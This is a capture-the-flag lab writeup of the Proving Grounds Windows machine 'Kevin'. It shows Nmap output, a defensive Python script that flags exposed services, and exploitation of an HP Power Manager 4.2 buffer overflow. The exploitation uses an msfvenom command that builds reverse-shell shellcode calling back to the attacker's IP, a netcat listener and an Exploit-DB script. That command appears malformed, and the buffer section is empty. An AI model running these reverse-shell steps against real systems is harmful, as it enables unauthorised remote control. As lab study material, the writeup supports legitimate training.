---
title: "Proving grounds Practice: Kevin"
layout: post
date: 2023-08-28 01:00
tag:
  - CTF
  - Offsec labs
  - OSCP
  - Writeup
  - Windows
  - Pg-Practice
writeups: true
hidden: true
author: Naveen
description: Offsec proving grounds practice windows machine writeup
---

## Nmap

```
PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.174.45/index.asp
| http-methods: 
|_  Supported Methods: GET HEAD
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
3573/tcp  open  tag-ups-1?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
```

## PORT : 80 : Web

HP Power Manager 4.2 (Build 7)


HP Power Manager 4.2 (Build 7) is vulnerable to a buffer overflow.
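From the defender's side, an added example that is not part of this writeup: a small parser that reads the Nmap output above and flags the same exposures an attacker would pick, so an asset inventory catches the HP Power Manager console before someone else does. The finding text and the `flag_exposures` rules are my own; the scan lines are copied from the scan above.

```python
import re

# Service lines copied from the Nmap scan above (PORT STATE SERVICE VERSION plus NSE script output).
NMAP_OUTPUT = """\
PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
445/tcp   open  microsoft-ds       Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
3573/tcp  open  tag-ups-1?
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Parse normal-format Nmap output into one dict per port, keeping NSE script lines."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and services:
            # NSE output ("| http-title: ...") belongs to the preceding port line.
            services[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return services

def flag_exposures(services):
    """Return (port, note) pairs for services this host should not expose unpatched."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        banner = " ".join([s["service"], s["version"]] + s["scripts"])
        if "HP Power Manager" in banner:
            findings.append((s["port"], "HP Power Manager console reachable; 4.2 (Build 7) "
                                        "has a known buffer overflow, verify build and patch"))
        if "Windows 7" in s["version"]:
            findings.append((s["port"], "SMB banner reveals end-of-life Windows 7 host"))
        if "ms-wbt-server" in s["service"]:
            findings.append((s["port"], "RDP exposed to the scanning network"))
    return findings

if __name__ == "__main__":
    for port, note in flag_exposures(parse_nmap(NMAP_OUTPUT)):
        print(f"{port}/tcp: {note}")
```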

## Exploitation

Download the exploit from Exploit-DB.

Generate the shellcode with the tun0 IP and the local port on which the listener will wait for the reverse connection.

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.156 LPORT=443  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x64/alpha_mixed --platform windows -f c
```

### Generated Buffer


Replace the buffer in the exploit code with the generated one.


Start a netcat listener on the port used in the payload above.

Run the exploit with python2; the reverse connection arrives within a few seconds.


Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.